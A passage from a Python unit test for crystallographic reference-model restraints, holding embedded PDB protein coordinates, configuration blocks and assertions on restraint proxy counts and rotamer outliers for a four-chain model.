ATOM   1993  CB  THR B   3      20.105   7.035  46.286  1.00 80.11           C
ATOM   1995  OG1 THR B   3      20.201   6.377  47.557  1.00 80.11           O
ATOM   1997  CG2 THR B   3      18.701   6.831  45.702  1.00 80.11           C
ATOM   2001  C   THR B   3      22.604   6.951  45.721  1.00 82.71           C
ATOM   2002  O   THR B   3      23.561   6.189  45.599  1.00 82.71           O
ATOM   2006  N   GLY B   4      22.752   8.203  46.153  1.00 80.69           N
ATOM   2007  CA  GLY B   4      24.064   8.716  46.532  1.00 80.69           C
ATOM   2010  C   GLY B   4      25.028   8.902  45.376  1.00 80.69           C
ATOM   2011  O   GLY B   4      26.250   8.861  45.572  1.00 80.69           O
ATOM   2013  N   ALA B   5      24.503   9.142  44.177  1.00 80.08           N
ATOM   2014  CA  ALA B   5      25.268   9.118  42.937  1.00 80.09           C
ATOM   2016  CB  ALA B   5      26.031   7.798  42.787  1.00 77.84           C
ATOM   2020  C   ALA B   5      24.301   9.316  41.777  1.00 80.09           C
ATOM   2021  O   ALA B   5      24.660   9.874  40.734  1.00 80.09           O
ATOM   2023  N   GLN B   6      23.035   8.849  42.004  1.00 81.52           N
ATOM   2024  CA  GLN B   6      21.978   8.970  41.003  1.00 81.53           C
ATOM   2026  CB  GLN B   6      20.722   8.250  41.506  1.00 84.25           C
ATOM   2029  CG  GLN B   6      19.920   9.000  42.596  1.00 84.24           C
ATOM   2032  CD  GLN B   6      20.032  10.516  42.500  1.00 84.25           C
ATOM   2033  OE1 GLN B   6      19.770  11.098  41.447  1.00 84.24           O
ATOM   2034  NE2 GLN B   6      20.441  11.159  43.593  1.00 84.25           N
ATOM   2037  C   GLN B   6      21.660  10.426  40.679  1.00 81.52           C
ATOM   2038  O   GLN B   6      21.344  10.750  39.530  1.00 81.52           O
ATOM   2040  N   VAL B   7      21.740  11.307  41.646  1.00 80.27           N
ATOM   2041  CA  VAL B   7      21.376  12.702  41.416  1.00 80.28           C
ATOM   2043  CB  VAL B   7      21.371  13.503  42.738  1.00 79.22           C
ATOM   2045  CG1 VAL B   7      21.092  15.002  42.494  1.00 79.23           C
ATOM   2049  CG2 VAL B   7      20.346  12.946  43.687  1.00 79.22           C
ATOM   2053  C   VAL B   7      22.311  13.348  40.415  1.00 80.27           C
ATOM   2054  O   VAL B   7      21.937  14.328  39.759  1.00 80.27           O
ATOM   2056  N   TYR B   8      23.517  12.809  40.259  1.00 79.95           N
ATOM   2057  CA  TYR B   8      24.474  13.363  39.313  1.00 79.95           C
ATOM   2059  CB  TYR B   8      25.847  12.697  39.486  1.00 79.66           C
ATOM   2062  CG  TYR B   8      26.909  13.218  38.529  1.00 79.66           C
ATOM   2063  CD1 TYR B   8      27.478  14.478  38.703  1.00 79.66           C
ATOM   2065  CE1 TYR B   8      28.444  14.958  37.831  1.00 79.66           C
ATOM   2067  CZ  TYR B   8      28.865  14.173  36.779  1.00 79.66           C
ATOM   2068  OH  TYR B   8      29.825  14.640  35.913  1.00 79.66           O
ATOM   2070  CE2 TYR B   8      28.325  12.919  36.585  1.00 79.66           C
ATOM   2072  CD2 TYR B   8      27.353  12.445  37.459  1.00 79.66           C
ATOM   2074  C   TYR B   8      23.951  13.207  37.884  1.00 79.95           C
ATOM   2075  O   TYR B   8      24.569  13.705  36.937  1.00 79.95           O
ATOM   2077  N   ALA B   9      22.809  12.526  37.712  1.00 80.47           N
ATOM   2078  CA  ALA B   9      22.221  12.378  36.382  1.00 80.47           C
ATOM   2080  CB  ALA B   9      21.051  11.395  36.420  1.00 78.95           C
ATOM   2084  C   ALA B   9      21.758  13.717  35.823  1.00 80.47           C
ATOM   2085  O   ALA B   9      21.827  13.949  34.609  1.00 80.47           O
ATOM   2087  N   ASN B  10      21.261  14.606  36.684  1.00 78.19           N
ATOM   2088  CA  ASN B  10      20.912  15.948  36.235  1.00 78.18           C
ATOM   2090  CB  ASN B  10      20.105  16.644  37.329  1.00 78.39           C
ATOM   2093  CG  ASN B  10      18.743  16.000  37.542  1.00 78.39           C
ATOM   2094  OD1 ASN B  10      18.177  15.401  36.628  1.00 78.39           O
ATOM   2095  ND2 ASN B  10      18.229  16.094  38.762  1.00 78.39           N
ATOM   2098  C   ASN B  10      22.147  16.764  35.859  1.00 78.19           C
ATOM   2099  O   ASN B  10      22.037  17.714  35.076  1.00 78.18           O
TER     116      ASN B  10
ATOM   3968  N   THR C   3      12.127   9.313  24.749  1.00 79.35           N
ATOM   3969  CA  THR C   3      10.942   8.737  24.046  1.00 79.35           C
ATOM   3971  CB  THR C   3      11.262   7.332  23.448  1.00 79.78           C
ATOM   3973  OG1 THR C   3      11.663   6.434  24.490  1.00 79.78           O
ATOM   3975  CG2 THR C   3      12.389   7.415  22.416  1.00 79.78           C
ATOM   3979  C   THR C   3       9.763   8.654  25.028  1.00 79.35           C
ATOM   3980  O   THR C   3       9.889   8.068  26.102  1.00 79.35           O
ATOM   3984  N   GLY C   4       8.622   9.230  24.652  1.00 79.79           N
ATOM   3985  CA  GLY C   4       7.500   9.425  25.558  1.00 79.79           C
ATOM   3988  C   GLY C   4       7.491  10.798  26.210  1.00 79.79           C
ATOM   3989  O   GLY C   4       8.275  11.700  25.895  1.00 79.79           O
ATOM   3991  N   ALA C   5       6.558  10.952  27.145  1.00 80.31           N
ATOM   3992  CA  ALA C   5       6.415  12.204  27.871  1.00 80.31           C
ATOM   3994  CB  ALA C   5       5.000  12.293  28.444  1.00 76.75           C
ATOM   3998  C   ALA C   5       7.437  12.387  28.995  1.00 80.31           C
ATOM   3999  O   ALA C   5       7.578  13.512  29.487  1.00 80.31           O
ATOM   4001  N   GLN C   6       8.160  11.330  29.402  1.00 79.57           N
ATOM   4002  CA  GLN C   6       8.950  11.380  30.637  1.00 79.57           C
ATOM   4004  CB  GLN C   6       9.511   9.998  31.005  1.00 81.75           C
ATOM   4007  CG  GLN C   6      10.700   9.510  30.181  1.00 81.75           C
ATOM   4010  CD  GLN C   6      10.314   9.110  28.788  1.00 81.75           C
ATOM   4011  OE1 GLN C   6       9.147   9.195  28.407  1.00 81.75           O
ATOM   4012  NE2 GLN C   6      11.293   8.668  28.008  1.00 81.75           N
ATOM   4015  C   GLN C   6      10.108  12.363  30.557  1.00 79.57           C
ATOM   4016  O   GLN C   6      10.641  12.760  31.599  1.00 79.57           O
ATOM   4018  N   VAL C   7      10.531  12.731  29.349  1.00 79.61           N
ATOM   4019  CA  VAL C   7      11.538  13.775  29.192  1.00 79.61           C
ATOM   4021  CB  VAL C   7      11.695  14.094  27.694  1.00 78.73           C
ATOM   4023  CG1 VAL C   7      10.350  14.552  27.106  1.00 79.29           C
ATOM   4027  CG2 VAL C   7      12.788  15.133  27.480  1.00 80.51           C
ATOM   4031  C   VAL C   7      11.178  15.010  30.006  1.00 79.62           C
ATOM   4032  O   VAL C   7      12.062  15.759  30.443  1.00 79.61           O
ATOM   4034  N   TYR C   8       9.882  15.234  30.243  1.00 78.80           N
ATOM   4035  CA  TYR C   8       9.422  16.321  31.101  1.00 78.80           C
ATOM   4037  CB  TYR C   8       7.887  16.311  31.116  1.00 79.05           C
ATOM   4040  CG  TYR C   8       7.242  17.382  31.967  1.00 79.05           C
ATOM   4041  CD1 TYR C   8       7.143  18.691  31.510  1.00 79.05           C
ATOM   4043  CE1 TYR C   8       6.548  19.676  32.279  1.00 79.05           C
ATOM   4045  CZ  TYR C   8       6.045  19.358  33.521  1.00 79.05           C
ATOM   4046  OH  TYR C   8       5.457  20.342  34.283  1.00 79.05           O
ATOM   4048  CE2 TYR C   8       6.125  18.064  33.998  1.00 79.05           C
ATOM   4050  CD2 TYR C   8       6.720  17.084  33.219  1.00 79.05           C
ATOM   4052  C   TYR C   8       9.983  16.231  32.521  1.00 78.80           C
ATOM   4053  O   TYR C   8       9.801  17.170  33.302  1.00 78.80           O
ATOM   4055  N   ALA C   9      10.675  15.139  32.866  1.00 79.52           N
ATOM   4056  CA  ALA C   9      11.171  14.948  34.228  1.00 79.52           C
ATOM   4058  CB  ALA C   9      12.014  13.674  34.293  1.00 78.34           C
ATOM   4062  C   ALA C   9      11.983  16.145  34.702  1.00 79.52           C
ATOM   4063  O   ALA C   9      11.793  16.641  35.818  1.00 79.52           O
ATOM   4065  N   ASN C  10      12.896  16.627  33.865  1.00 80.25           N
ATOM   4066  CA  ASN C  10      13.672  17.797  34.239  1.00 80.25           C
ATOM   4068  CB  ASN C  10      14.712  18.063  33.172  1.00 78.17           C
ATOM   4071  CG  ASN C  10      15.782  17.007  33.161  1.00 78.17           C
ATOM   4072  OD1 ASN C  10      16.004  16.325  34.166  1.00 78.17           O
ATOM   4073  ND2 ASN C  10      16.442  16.845  32.028  1.00 78.17           N
ATOM   4076  C   ASN C  10      12.798  19.015  34.457  1.00 80.25           C
ATOM   4077  O   ASN C  10      13.290  20.040  34.941  1.00 80.25           O
TER     174      ASN C  10
ATOM   5959  N   THR D   3      60.805  23.774   6.731  1.00 77.43           N
ATOM   5960  CA  THR D   3      61.763  22.725   7.191  1.00 77.43           C
ATOM   5962  CB  THR D   3      62.603  22.175   6.010  1.00 78.92           C
ATOM   5964  OG1 THR D   3      63.305  23.243   5.360  1.00 78.92           O
ATOM   5966  CG2 THR D   3      61.703  21.469   5.000  1.00 78.92           C
ATOM   5970  C   THR D   3      62.675  23.293   8.284  1.00 77.43           C
ATOM   5971  O   THR D   3      62.761  24.506   8.443  1.00 77.43           O
ATOM   5975  N   GLY D   4      63.363  22.412   9.022  1.00 79.20           N
ATOM   5976  CA  GLY D   4      64.130  22.797  10.196  1.00 79.20           C
ATOM   5979  C   GLY D   4      63.309  22.788  11.472  1.00 79.20           C
ATOM   5980  O   GLY D   4      62.145  22.393  11.509  1.00 79.20           O
ATOM   5982  N   ALA D   5      63.950  23.233  12.557  1.00 80.19           N
ATOM   5983  CA  ALA D   5      63.257  23.361  13.836  1.00 80.19           C
ATOM   5985  CB  ALA D   5      64.211  23.993  14.857  1.00 75.84           C
ATOM   5989  C   ALA D   5      61.970  24.181  13.714  1.00 80.19           C
ATOM   5990  O   ALA D   5      60.999  23.931  14.438  1.00 80.19           O
ATOM   5992  N   GLN D   6      61.942  25.142  12.784  1.00 78.97           N
ATOM   5993  CA  GLN D   6      60.843  26.092  12.591  1.00 78.97           C
ATOM   5995  CB  GLN D   6      61.204  27.062  11.469  1.00 80.12           C
ATOM   5998  CG  GLN D   6      61.464  26.355  10.144  1.00 80.12           C
ATOM   6001  CD  GLN D   6      61.853  27.306   9.032  1.00 80.12           C
ATOM   6002  OE1 GLN D   6      62.179  28.464   9.288  1.00 80.12           O
ATOM   6003  NE2 GLN D   6      61.851  26.812   7.790  1.00 80.12           N
ATOM   6006  C   GLN D   6      59.510  25.447  12.245  1.00 78.96           C
ATOM   6007  O   GLN D   6      58.509  26.166  12.139  1.00 78.96           O
ATOM   6009  N   VAL D   7      59.474  24.140  11.995  1.00 78.86           N
ATOM   6010  CA  VAL D   7      58.194  23.449  11.865  1.00 78.86           C
ATOM   6012  CB  VAL D   7      58.425  21.993  11.421  1.00 81.21           C
ATOM   6014  CG1 VAL D   7      58.877  21.975   9.986  1.00 81.21           C
ATOM   6018  CG2 VAL D   7      59.474  21.288  12.321  1.00 81.21           C
ATOM   6022  C   VAL D   7      57.423  23.523  13.168  1.00 78.86           C
ATOM   6023  O   VAL D   7      56.190  23.411  13.186  1.00 78.86           O
ATOM   6025  N   TYR D   8      58.138  23.697  14.277  1.00 79.34           N
ATOM   6026  CA  TYR D   8      57.515  23.918  15.568  1.00 79.34           C
ATOM   6028  CB  TYR D   8      58.584  23.823  16.649  1.00 79.01           C
ATOM   6031  CG  TYR D   8      58.096  24.160  18.024  1.00 79.01           C
ATOM   6032  CD1 TYR D   8      57.220  23.317  18.688  1.00 79.01           C
ATOM   6034  CE1 TYR D   8      56.778  23.608  19.947  1.00 79.01           C
ATOM   6036  CZ  TYR D   8      57.227  24.739  20.578  1.00 79.01           C
ATOM   6037  OH  TYR D   8      56.779  25.015  21.845  1.00 79.01           O
ATOM   6039  CE2 TYR D   8      58.111  25.590  19.948  1.00 79.01           C
ATOM   6041  CD2 TYR D   8      58.544  25.294  18.680  1.00 79.01           C
ATOM   6043  C   TYR D   8      56.807  25.258  15.636  1.00 79.34           C
ATOM   6044  O   TYR D   8      55.950  25.447  16.505  1.00 79.34           O
ATOM   6046  N   ALA D   9      57.137  26.174  14.730  1.00 78.81           N
ATOM   6047  CA  ALA D   9      56.591  27.522  14.741  1.00 78.81           C
ATOM   6049  CB  ALA D   9      56.758  28.183  13.374  1.00 79.37           C
ATOM   6053  C   ALA D   9      55.127  27.498  15.121  1.00 78.81           C
ATOM   6054  O   ALA D   9      54.764  27.896  16.226  1.00 78.81           O
ATOM   6056  N   ASN D  10      54.284  26.983  14.233  1.00 80.12           N
ATOM   6057  CA  ASN D  10      52.848  27.017  14.467  1.00 80.13           C
ATOM   6059  CB  ASN D  10      52.140  26.402  13.274  1.00 80.26           C
ATOM   6062  CG  ASN D  10      52.645  25.031  12.969  1.00 80.26           C
ATOM   6063  OD1 ASN D  10      53.101  24.311  13.860  1.00 80.26           O
ATOM   6064  ND2 ASN D  10      52.586  24.655  11.705  1.00 80.26           N
ATOM   6067  C   ASN D  10      52.420  26.314  15.753  1.00 80.14           C
ATOM   6068  O   ASN D  10      51.225  26.333  16.068  1.00 80.16           O
TER     232      ASN D  10
END
"""
  pdb_str_ref_minimized = """\
CRYST1   69.211   49.956   52.557  90.00  90.00  90.00 P 1
SCALE1      0.014449  0.000000  0.000000        0.00000
SCALE2      0.000000  0.020018  0.000000        0.00000
SCALE3      0.000000  0.000000  0.019027        0.00000
ATOM      1  N   THR A   3      50.767  43.905  24.734  1.00 80.52           N
ATOM      2  CA  THR A   3      50.582  43.115  23.523  1.00 80.52           C
ATOM      4  CB  THR A   3      49.583  41.964  23.746  1.00 79.62           C
ATOM      6  OG1 THR A   3      49.442  41.209  22.536  1.00 79.62           O
ATOM      8  CG2 THR A   3      48.225  42.510  24.160  1.00 79.62           C
ATOM     12  C   THR A   3      50.093  43.985  22.370  1.00 80.52           C
ATOM     13  O   THR A   3      49.756  45.154  22.562  1.00 80.52           O
ATOM     17  N   GLY A   4      50.055  43.408  21.174  1.00 79.31           N
ATOM     18  CA  GLY A   4      49.609  44.126  19.994  1.00 79.31           C
ATOM     21  C   GLY A   4      49.582  43.269  18.744  1.00 79.31           C
ATOM     22  O   GLY A   4      48.530  43.075  18.136  1.00 79.31           O
ATOM     24  N   ALA A   5      50.746  42.754  18.361  1.00 78.81           N
ATOM     25  CA  ALA A   5      50.858  41.913  17.175  1.00 78.81           C
ATOM     27  CB  ALA A   5      51.904  42.473  16.224  1.00 77.40           C
ATOM     31  C   ALA A   5      51.199  40.476  17.556  1.00 78.81           C
ATOM     32  O   ALA A   5      51.983  39.814  16.877  1.00 78.81           O
ATOM     34  N   GLN A   6      50.604  40.001  18.645  1.00 80.55           N
ATOM     35  CA  GLN A   6      50.843  38.643  19.118  1.00 80.55           C
ATOM     37  CB  GLN A   6      51.379  38.655  20.554  1.00 79.84           C
ATOM     40  CG  GLN A   6      52.763  39.273  20.711  1.00 79.84           C
ATOM     43  CD  GLN A   6      52.740  40.791  20.698  1.00 79.84           C
ATOM     44  OE1 GLN A   6      51.676  41.408  20.641  1.00 79.84           O
ATOM     45  NE2 GLN A   6      53.919  41.400  20.750  1.00 79.84           N
ATOM     48  C   GLN A   6      49.570  37.807  19.041  1.00 80.55           C
ATOM     49  O   GLN A   6      49.417  36.823  19.765  1.00 80.55           O
ATOM     51  N   VAL A   7      48.660  38.205  18.158  1.00 79.06           N
ATOM     52  CA  VAL A   7      47.399  37.495  17.985  1.00 79.06           C
ATOM     54  CB  VAL A   7      46.201  38.453  18.098  1.00 78.99           C
ATOM     56  CG1 VAL A   7      44.896  37.694  17.913  1.00 78.99           C
ATOM     60  CG2 VAL A   7      46.222  39.173  19.437  1.00 78.99           C
ATOM     64  C   VAL A   7      47.382  36.766  16.647  1.00 79.06           C
ATOM     65  O   VAL A   7      47.123  35.564  16.586  1.00 79.06           O
ATOM     67  N   TYR A   8      47.661  37.501  15.575  1.00 79.78           N
ATOM     68  CA  TYR A   8      47.677  36.928  14.235  1.00 79.78           C
ATOM     70  CB  TYR A   8      47.601  38.032  13.178  1.00 77.69           C
ATOM     73  CG  TYR A   8      47.544  37.522  11.755  1.00 77.69           C
ATOM     74  CD1 TYR A   8      46.344  37.106  11.194  1.00 77.69           C
ATOM     76  CE1 TYR A   8      46.286  36.641   9.894  1.00 77.69           C
ATOM     78  CZ  TYR A   8      47.437  36.589   9.136  1.00 77.69           C
ATOM     79  OH  TYR A   8      47.384  36.126   7.842  1.00 77.69           O
ATOM     81  CE2 TYR A   8      48.641  36.998   9.670  1.00 77.69           C
ATOM     83  CD2 TYR A   8      48.689  37.462  10.971  1.00 77.69           C
ATOM     85  C   TYR A   8      48.925  36.077  14.022  1.00 79.78           C
ATOM     86  O   TYR A   8      48.903  35.104  13.267  1.00 79.78           O
ATOM     88  N   ALA A   9      50.010  36.450  14.691  1.00 79.03           N
ATOM     89  CA  ALA A   9      51.269  35.722  14.577  1.00 79.02           C
ATOM     91  CB  ALA A   9      52.423  36.578  15.075  1.00 79.18           C
ATOM     95  C   ALA A   9      51.210  34.407  15.346  1.00 79.02           C
ATOM     96  O   ALA A   9      51.871  33.434  14.982  1.00 79.02           O
ATOM     98  N   ASN A  10      50.416  34.384  16.411  1.00 79.63           N
ATOM     99  CA  ASN A  10      50.270  33.188  17.233  1.00 79.63           C
ATOM    101  CB  ASN A  10      50.147  33.564  18.711  1.00 78.91           C
ATOM    104  CG  ASN A  10      51.365  34.304  19.227  1.00 78.91           C
ATOM    105  OD1 ASN A  10      52.472  34.134  18.716  1.00 78.91           O
ATOM    106  ND2 ASN A  10      51.167  35.132  20.246  1.00 78.91           N
ATOM    109  C   ASN A  10      49.059  32.369  16.797  1.00 79.63           C
ATOM    110  O   ASN A  10      49.101  31.139  16.787  1.00 79.63           O
TER
"""
  # Write the single-chain reference to disk; reference_model() reads it by
  # file name.  Context manager guarantees the handle is closed on error.
  with open("ref.pdb", 'w') as ref_file:
    ref_file.write(pdb_str_ref_minimized)
  log = cStringIO.StringIO()
  # log = sys.stdout
  # orig_file = open("start.pdb", "w")
  # orig_file.write(pdb_str_original)
  # orig_file.close()
  def_pars = reference_model_params
  # Four explicit groups, each restraining one model chain to reference
  # chain A from the same file.
  params_text = """\
reference_model {
  reference_group {
    reference = chain 'A'
    selection = chain 'A'
    file_name = "ref.pdb"
  }
  reference_group {
    reference = chain 'A'
    selection = chain 'B'
    file_name = "ref.pdb"
  }
  reference_group {
    reference = chain 'A'
    selection = chain 'C'
    file_name = "ref.pdb"
  }
  reference_group {
    reference = chain 'A'
    selection = chain 'D'
    file_name = "ref.pdb"
  }
} """
  pars = iotbx.phil.parse(params_text)
  all_pars = def_pars.fetch(pars).extract()
  all_pars.reference_model.enabled = True
  model = mmtbx.model.manager(
      model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
        source_info=None),
      process_input=True)
  pdb_h = model.get_hierarchy()
  rm = reference_model(
      model=model,
      reference_file_list=['ref.pdb'],
      params=all_pars.reference_model,
      log=log)
  # rm.show_reference_summary(log=log)
  # Four chains each matched to reference chain A: 4 x 31 = 124 proxies.
  assert rm.get_n_proxies() == 124, \
      "Expecting 124 proxies, got %d" % rm.get_n_proxies()
  # STOP()
  # Applying the reference rotamers must leave no rotamer outliers.
  new_h = pdb_h.deep_copy()
  xray_structure = new_h.extract_xray_structure()
  rm.set_rotamer_to_reference(
      xray_structure=xray_structure)
  new_h.adopt_xray_structure(xray_structure)
  r1 = rotalyze(pdb_hierarchy=new_h, outliers_only=False)
  assert r1.n_outliers == 0
  # new_h.write_pdb_file(file_name="final.pdb")
  #
  # The same, but with the reference spread over four identical files.
  for i in range(4):
    with open("ref_%d.pdb" % i, 'w') as ref_file:
      ref_file.write(pdb_str_ref_minimized)
  def_pars = reference_model_params
  params_text = """\
reference_model {
  file = ref_0.pdb
  file = ref_1.pdb
  file = ref_2.pdb
  file = ref_3.pdb
  reference_group {
    reference = chain 'A'
    selection = chain 'A'
    file_name = "ref_0.pdb"
  }
  reference_group {
    reference = chain 'A'
    selection = chain 'B'
    file_name = "ref_1.pdb"
  }
  reference_group {
    reference = chain 'A'
    selection = chain 'C'
    file_name = "ref_2.pdb"
  }
  reference_group {
    reference = chain 'A'
    selection = chain 'D'
    file_name = "ref_3.pdb"
  }
} """
  pars = iotbx.phil.parse(params_text)
  all_pars = def_pars.fetch(pars).extract()
  all_pars.reference_model.enabled = True
  rm = reference_model(
      model=model,
      reference_file_list=['ref_0.pdb', 'ref_1.pdb', 'ref_2.pdb', 'ref_3.pdb'],
      params=all_pars.reference_model,
      log=log)
  assert rm.get_n_proxies() == 124, \
      "Expecting 124 proxies, got %d" % rm.get_n_proxies()
  for i in range(4):
    os.remove("ref_%d.pdb" % i)
  #
  # The same, but only one group (chain A restrained to itself).
  # NOTE(review): the original comment expected 116/4=29 proxies while the
  # assertion below checks for 31 -- confirm the intended count.
  with open("ref_0.pdb", 'w') as ref_file:
    ref_file.write(pdb_str_ref_minimized)
  def_pars = reference_model_params
  params_text = """\
reference_model {
  file = ref_0.pdb
  reference_group {
    reference = chain 'A'
    selection = chain 'A'
    file_name = "ref_0.pdb"
  }
} """
  pars = iotbx.phil.parse(params_text)
  all_pars = def_pars.fetch(pars).extract()
  all_pars.reference_model.enabled = True
  rm = reference_model(
      model=model,
      reference_file_list=['ref_0.pdb'],
      params=all_pars.reference_model,
      log=log)
  assert rm.get_n_proxies() == 31, \
      "Expecting 31 proxies, got %d" % rm.get_n_proxies()
  # Disabling side chains should drop the chi-angle proxies.
  all_pars.reference_model.side_chain=False
  rm = reference_model(
      model=model,
      reference_file_list=['ref_0.pdb'],
      params=all_pars.reference_model,
      log=log)
  assert rm.get_n_proxies() == 21, \
      "Expecting 21 proxies, got %d" % rm.get_n_proxies()
  # Side chains only (no main-chain phi/psi/omega proxies).
  all_pars.reference_model.side_chain=True
  all_pars.reference_model.main_chain=False
  rm = reference_model(
      model=model,
      reference_file_list=['ref_0.pdb'],
      params=all_pars.reference_model,
      log=log)
  assert rm.get_n_proxies() == 10, \
      "Expecting 10 proxies, got %d" % rm.get_n_proxies()
  # Just throw everything in without specifying groups -- automatic matching
  # should again restrain all four chains.
  all_pars = def_pars.fetch().extract()
  all_pars.reference_model.enabled = True
  all_pars.reference_model.file = 'ref_0.pdb'
  rm = reference_model(
      model=model,
      reference_file_list=['ref_0.pdb'],
      params=all_pars.reference_model,
      log=log)
  assert rm.get_n_proxies() == 124, \
      "Expecting 124 proxies, got %d" % rm.get_n_proxies()
  os.remove("ref_0.pdb")
  # Reference on self: make sure chains map onto themselves (A<->A, B<->B...).
  log = cStringIO.StringIO()
  def_pars = reference_model_params
  all_pars = def_pars.fetch().extract()
  all_pars.reference_model.enabled = True
  all_pars.reference_model.use_starting_model_as_reference = True
  rm = reference_model(
      model=model,
      reference_hierarchy_list=\
          [model.get_hierarchy()],
      params=all_pars.reference_model,
      log=log)
  rm.show_reference_summary(log=log)
  log_strings = log.getvalue().split("\n")
  # print rm.get_n_proxies()
  # print "=========="
  # print "\n".join(log_strings)
  # print "=========="
  assert rm.get_n_proxies() == 124, \
      "Expecting 124 proxies, got %d" % rm.get_n_proxies()
  for needed_string in [
      "GLN A   6  <=====>  GLN A   6",
      "ALA A   9  <=====>  ALA A   9",
      "ASN A  10  <=====>  ASN A  10",
      "THR B   3  <=====>  THR B   3",
      "GLN B   6  <=====>  GLN B   6",
      "ALA B   9  <=====>  ALA B   9",
      "ASN B  10  <=====>  ASN B  10",
      "THR C   3  <=====>  THR C   3",
      "GLN C   6  <=====>  GLN C   6",
      "ALA D   5  <=====>  ALA D   5",
      "GLN D   6  <=====>  GLN D   6",
      ]:
    assert needed_string in log_strings, "'%s' not in log!" % needed_string
def exercise_multiple_ncs_groups_found(mon_lib_srv, ener_lib):
  """Exercise reference-model restraints when the model/reference pair
  contains more than one matching (NCS-like) chain group.

  The model and the reference each contain a two-residue chain C fragment
  and an eight-residue chain A; both pairs must be matched, giving 36
  dihedral proxies in total.

  NOTE(review): ``mon_lib_srv`` and ``ener_lib`` are unused in the body; the
  signature matches the other exercises in this file.
  """
  pdb_str_original = """\
CRYST1   49.945   53.842   33.425  90.00  90.00  90.00 P 1
ATOM   5466  N   ASN C 236       9.580  47.176  25.356  1.00 60.13           N
ATOM   5467  CA  ASN C 236       8.200  46.668  25.442  1.00 60.52           C
ATOM   5468  C   ASN C 236       8.058  45.158  25.655  1.00 60.49           C
ATOM   5469  O   ASN C 236       7.110  44.527  25.191  1.00 60.60           O
ATOM   5470  CB  ASN C 236       7.370  47.129  24.244  1.00 60.55           C
ATOM   5471  CG  ASN C 236       6.038  47.680  24.666  1.00 61.75           C
ATOM   5472  OD1 ASN C 236       5.937  48.842  25.096  1.00 62.86           O
ATOM   5473  ND2 ASN C 236       5.000  46.849  24.575  1.00 61.22           N
ATOM   5474  N   LEU C 237       8.997  44.597  26.396  1.00 60.55           N
ATOM   5475  CA  LEU C 237       9.125  43.164  26.494  1.00 60.48           C
ATOM   5476  C   LEU C 237       9.496  42.788  27.909  1.00 60.06           C
ATOM   5477  O   LEU C 237       9.016  41.780  28.425  1.00 60.41           O
ATOM   5478  CB  LEU C 237      10.199  42.697  25.506  1.00 60.91           C
ATOM   5479  CG  LEU C 237      10.223  41.328  24.819  1.00 62.25           C
ATOM   5480  CD1 LEU C 237       9.088  40.386  25.251  1.00 63.18           C
ATOM   5481  CD2 LEU C 237      10.244  41.542  23.293  1.00 62.89           C
TER
ATOM      1  N   THR A   3      42.874  19.189  20.321  1.00 80.52           N
ATOM      2  CA  THR A   3      42.493  17.965  19.539  1.00 80.52           C
ATOM      4  CB  THR A   3      42.127  16.792  20.509  1.00 79.62           C
ATOM      6  OG1 THR A   3      41.887  15.591  19.761  1.00 79.62           O
ATOM      8  CG2 THR A   3      40.920  17.121  21.394  1.00 79.62           C
ATOM     12  C   THR A   3      41.338  18.247  18.549  1.00 80.52           C
ATOM     13  O   THR A   3      40.201  18.456  18.959  1.00 80.52           O
ATOM     17  N   GLY A   4      41.644  18.246  17.245  1.00 79.31           N
ATOM     18  CA  GLY A   4      40.711  18.691  16.220  1.00 79.31           C
ATOM     21  C   GLY A   4      40.442  17.713  15.089  1.00 79.31           C
ATOM     22  O   GLY A   4      39.471  16.958  15.136  1.00 79.31           O
ATOM     24  N   ALA A   5      41.262  17.732  14.043  1.00 78.81           N
ATOM     25  CA  ALA A   5      41.076  16.837  12.909  1.00 78.81           C
ATOM     27  CB  ALA A   5      41.455  17.547  11.611  1.00 77.40           C
ATOM     31  C   ALA A   5      41.876  15.548  13.042  1.00 78.81           C
ATOM     32  O   ALA A   5      41.939  14.770  12.085  1.00 78.81           O
ATOM     34  N   GLN A   6      42.497  15.306  14.200  1.00 80.55           N
ATOM     35  CA  GLN A   6      43.323  14.113  14.346  1.00 80.55           C
ATOM     37  CB  GLN A   6      44.064  14.112  15.682  1.00 79.84           C
ATOM     40  CG  GLN A   6      44.945  15.305  15.924  1.00 79.84           C
ATOM     43  CD  GLN A   6      44.171  16.444  16.553  1.00 79.84           C
ATOM     44  OE1 GLN A   6      42.971  16.324  16.817  1.00 79.84           O
ATOM     45  NE2 GLN A   6      44.848  17.558  16.796  1.00 79.84           N
ATOM     48  C   GLN A   6      42.469  12.864  14.273  1.00 80.55           C
ATOM     49  O   GLN A   6      42.829  11.892  13.601  1.00 80.55           O
ATOM     51  N   VAL A   7      41.324  12.884  14.959  1.00 79.06           N
ATOM     52  CA  VAL A   7      40.503  11.693  15.123  1.00 79.06           C
ATOM     54  CB  VAL A   7      39.291  12.027  16.016  1.00 78.99           C
ATOM     56  CG1 VAL A   7      38.330  10.839  16.122  1.00 78.99           C
ATOM     60  CG2 VAL A   7      39.756  12.478  17.391  1.00 78.99           C
ATOM     64  C   VAL A   7      40.080  11.140  13.778  1.00 79.06           C
ATOM     65  O   VAL A   7      39.643   9.988  13.688  1.00 79.06           O
ATOM     67  N   TYR A   8      40.219  11.933  12.718  1.00 79.78           N
ATOM     68  CA  TYR A   8      40.126  11.380  11.379  1.00 79.78           C
ATOM     70  CB  TYR A   8      40.413  12.461  10.342  1.00 77.69           C
ATOM     73  CG  TYR A   8      40.315  11.969   8.911  1.00 77.69           C
ATOM     74  CD1 TYR A   8      39.085  11.871   8.272  1.00 77.69           C
ATOM     76  CE1 TYR A   8      38.989  11.420   6.968  1.00 77.69           C
ATOM     78  CZ  TYR A   8      40.125  11.035   6.294  1.00 77.69           C
ATOM     79  OH  TYR A   8      40.036  10.581   5.000  1.00 77.69           O
ATOM     81  CE2 TYR A   8      41.353  11.105   6.908  1.00 77.69           C
ATOM     83  CD2 TYR A   8      41.444  11.566   8.211  1.00 77.69           C
ATOM     85  C   TYR A   8      41.097  10.224  11.185  1.00 79.78           C
ATOM     86  O   TYR A   8      40.883   9.397  10.295  1.00 79.78           O
ATOM     88  N   ALA A   9      42.156  10.145  11.999  1.00 79.03           N
ATOM     89  CA  ALA A   9      43.144   9.077  11.874  1.00 79.02           C
ATOM     91  CB  ALA A   9      44.125   9.129  13.047  1.00 79.18           C
ATOM     95  C   ALA A   9      42.514   7.692  11.812  1.00 79.02           C
ATOM     96  O   ALA A   9      43.151   6.757  11.310  1.00 79.02           O
ATOM     98  N   ASN A  10      41.292   7.531  12.330  1.00 79.63           N
ATOM     99  CA  ASN A  10      40.571   6.269  12.224  1.00 79.63           C
ATOM    101  CB  ASN A  10      39.519   6.171  13.330  1.00 78.91           C
